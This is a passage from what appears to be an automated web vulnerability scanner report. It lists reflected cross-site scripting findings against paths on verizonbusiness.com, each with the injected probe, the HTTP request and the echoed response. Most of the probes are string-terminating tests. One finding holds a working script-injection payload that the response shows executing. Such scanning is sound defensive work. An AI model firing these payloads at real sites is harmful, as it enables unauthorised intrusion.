hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.754. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a9-111-Webinars+&+Videos.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd48e'%3b2960239fba1 was submitted in the REST URL parameter 1. This input was echoed as cd48e';2960239fba1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcescd48e'%3b2960239fba1/1002a3a9-111-Webinars+&+Videos.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:09 GMT
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resourcescd48e';2960239fba1/1002a3a9-111-Webinars+&+Videos.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.755. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a9-111-Webinars+&+Videos.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71ecb</script><script>alert(1)</script>b9ec17c16f3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a3a9-111-Webinars+71ecb</script><script>alert(1)</script>b9ec17c16f3&+Videos.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 17 Nov 2010 00:31:14 GMT
Server: Roxen/4.5.146-release3
ETag: "1e4196c6494c575fa81d01b257d3c42a"
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:31:14 GMT
Connection: close
Connection: Transfer-Encoding
Expires: Mon, 16 Nov 2009 18:31:14 GMT
Content-Length: 47303

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<url>/resources/1002a3a9-111-Webinars+71ecb</script><script>alert(1)</script>b9ec17c16f3&+Videos.xml</url>
...[SNIP]...

1.756. http://www.verizonbusiness.com/resources/1002a3a9-111-Webinars+&+Videos.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a3a9-111-Webinars+&+Videos.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75ac2'%3b78d1b53f805 was submitted in the REST URL parameter 2. This input was echoed as 75ac2';78d1b53f805 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/75ac2'%3b78d1b53f805&+Videos.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:31:28 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40234
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/75ac2';78d1b53f805&+Videos.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.757. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be033"%3b75616d7df24 was submitted in the REST URL parameter 1. This input was echoed as be033";75616d7df24 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesbe033"%3b75616d7df24/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:10 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40724
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesbe033";75616d7df24/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv=
...[SNIP]...

1.758. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2034e'%3b12a357c2b15 was submitted in the REST URL parameter 1. This input was echoed as 2034e';12a357c2b15 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources2034e'%3b12a357c2b15/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:20 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40722
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources2034e';12a357c2b15/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.759. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59dea'%3b275f19d1fc1 was submitted in the REST URL parameter 2. This input was echoed as 59dea';275f19d1fc1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies59dea'%3b275f19d1fc1/cs_constellation-energy-power-of-choice_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:46 GMT
Content-Type: text/html
Content-Length: 40332
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/casestudies59dea';275f19d1fc1/cs_constellation-energy-power-of-choice_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.760. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9603b"%3bdde0253657a was submitted in the REST URL parameter 2. This input was echoed as 9603b";dde0253657a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies9603b"%3bdde0253657a/cs_constellation-energy-power-of-choice_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:37 GMT
Content-Type: text/html
Content-Length: 40332
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/casestudies9603b";dde0253657a/cs_constellation-energy-power-of-choice_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VA
...[SNIP]...

1.761. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73cc5'%3bf169b799b30 was submitted in the REST URL parameter 3. This input was echoed as 73cc5';f169b799b30 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf73cc5'%3bf169b799b30 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:12 GMT
Content-Type: text/html
Content-Length: 40334
Date: Wed, 17 Nov 2010 00:05:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf73cc5';f169b799b30'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.762. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1592b"%3b390b1708c56 was submitted in the REST URL parameter 3. This input was echoed as 1592b";390b1708c56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf1592b"%3b390b1708c56 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40332
Date: Wed, 17 Nov 2010 00:05:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
USTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf1592b";390b1708c56";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.763. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35db8"%3bee1ef8482ca was submitted in the REST URL parameter 1. This input was echoed as 35db8";ee1ef8482ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources35db8"%3bee1ef8482ca/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40760
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources35db8";ee1ef8482ca/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTIO
...[SNIP]...

1.764. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f181'%3bd4a20962a13 was submitted in the REST URL parameter 1. This input was echoed as 7f181';d4a20962a13 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources7f181'%3bd4a20962a13/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40758
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources7f181';d4a20962a13/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.765. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31bf2'%3b47bdbe2e1c9 was submitted in the REST URL parameter 2. This input was echoed as 31bf2';47bdbe2e1c9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies31bf2'%3b47bdbe2e1c9/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40370
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/casestudies31bf2';47bdbe2e1c9/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.766. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9595a"%3bae90b39e3fa was submitted in the REST URL parameter 2. This input was echoed as 9595a";ae90b39e3fa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies9595a"%3bae90b39e3fa/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
